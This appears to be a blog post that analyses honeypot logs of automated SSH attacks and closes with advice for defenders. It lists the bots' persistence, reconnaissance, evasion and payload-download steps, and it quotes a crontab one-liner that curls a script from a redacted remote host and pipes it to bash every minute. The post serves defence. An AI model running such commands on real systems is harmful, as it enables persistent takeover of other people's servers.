Peering into the Abyss: The Automated Attacker's Playbook Revealed

---

Ever wondered what happens in the first few moments after a web server is compromised? Thanks to monitoring attacks over many sessions, we don't have to wonder. We can watch it happen in real time. By analysing logs over many sessions, we've pieced together the common playbook used by automated bots from around the globe. Their methods are fast, efficient, and offer crucial lessons for anyone defending a network.

Here are the most common techniques and behaviours I observed.

1. Securing the Beachhead: Immediate and Redundant Persistence

The very first priority for these attackers is ensuring they can't be easily kicked out. Before they even bother to see what kind of system they've landed on, their scripts immediately work to create multiple ways back in.

• SSH Key Injection: The most common action is to completely wipe and recreate the .ssh directory. The script then injects the attacker's own public SSH key into the authorized_keys file. This gives them persistent, password-less access for future sessions.

• Changing the Root Password: As a secondary form of access, the scripts immediately change the root password using the chpasswd command. The new passwords appear to be randomly generated for each attack, highlighting the automated nature of the campaign.

2. Sizing Up the Prize: Rapid System Reconnaissance

Once persistence is established, the bots run a swift, automated reconnaissance sweep to profile the machine. This helps them determine the system's capabilities, likely to see if it's a valuable target for resource-intensive tasks like cryptocurrency mining and what specific malware to deploy.

This discovery phase involves a barrage of standard Linux commands:

• Hardware Inspection: They check things like the CPU model, core count, and architecture (cat /proc/cpuinfo, lscpu, uname -m).

• Memory and Disk Space: They check available RAM (free -m) and disk space (df -h).

• Operating System Details: They verify the kernel version and OS information with uname -a.

• User Activity: They check who is logged in with w and whoami. The second part likely used to understand which brute force account was successful during logon.

3. Erasing the Competition: Defence Evasion and Anti-Forensics

These attackers exhibit a "king of the hill" mentality. Their scripts include commands specifically designed to find and eliminate competing malware or system monitoring tools.

• Killing Competing Processes: The scripts frequently attempt to kill processes with common malware names like secure.sh and auth.sh.

• Clearing Firewall Rules: They often wipe the contents of /etc/hosts.deny, a file used to block incoming connections, to ensure their own command-and-control servers aren't blocked.

• Unlocking Files: A common first step before modifying SSH keys is running chattr -ia .ssh. This removes the "immutable" attribute from the directory, a security measure sometimes used by administrators to prevent unauthorised changes.

• Wiping History: Some of the more thorough scripts conclude by running history -c to clear the command history, a simple but effective anti-forensics technique.

4. The Payload Drop: Downloading Malicious Code

After profiling the system and clearing out rivals, the primary objective begins: downloading the malware. Attackers consistently use built-in command-line tools for this, a technique known as "Living off the Land" because it uses the system's own utilities to avoid detection.

• Use of wget and curl: Attackers may use wget, curl, SCP or SFTP to fetch their payloads from a remote server. These payloads are often generic shell scripts (sh) or known malware binaries like kinsing, a notorious cryptominer.

• Use of /tmp: The /tmp directory is the preferred location for downloading these files, as it is almost always world-writable.

5. Execution and Hiding: Running the Malware

Once the payload is on the system, the final steps are to make it executable and run it in a way that survives the end of the SSH session.

• Making Files Executable: The chmod 777 or chmod +x command is used to grant execute permissions to the downloaded file.

• Detaching from the Terminal: Attackers use nohup ... & to run their malware as a background process that won't be terminated when their session closes.

6. Establishing Long-Term Persistence with Cron

Beyond just adding an SSH key, some of the more advanced scripts add a scheduled task, or cron job, to ensure their malware is re-executed automatically. This guarantees the malicious process will restart even if a system administrator finds and kills it or the server is rebooted.

• Command Example: (crontab -l 2>/dev/null; echo \"* * * * * curl -sL http://[REDACTED]/sc.sh | bash > /dev/null 2>&1\")|crontab -. This command downloads and executes a script from a remote server every single minute.

Takeaways for Defenders

The behaviour of these bots is predictable, which is good news for defenders. Monitoring for this specific sequence of actions can provide early warnings of a compromise:

• Monitor Critical Files: Keep a close eye on changes to ~/.ssh/authorized_keys, /etc/passwd, and /etc/hosts.deny.

• Scrutinise Network Traffic: Look for unusual outbound connections from tools like curl and wget to unknown IP addresses.

• Audit Process Execution: Be suspicious of processes being executed from world-writable directories like /tmp.

• Regularly Check Cron Jobs: Periodically review crontab entries for all users to catch malicious scheduled tasks.

• Harden SSH: Disable password-based authentication for root users and enforce the use of strong SSH keys to prevent the initial intrusion.

• Passwords: If you are going to use passwords, make sure they are really really really strong and haven’t been compromised !

Conclusion: The Predictable Robot Dance

So, while peering into the world of automated attacks can seem a little intimidating, there's a silver lining: it's all just a predictable robot dance. These bots aren't cunning masterminds; they're following the same simple script over and over.

Their predictability is their greatest weakness and your greatest strength. By learning the techniques used, you can build a defence that easily trips them up. Keep your systems updated, your monitoring sharp, always validate and you can stay one step ahead of the bots. Happy defending!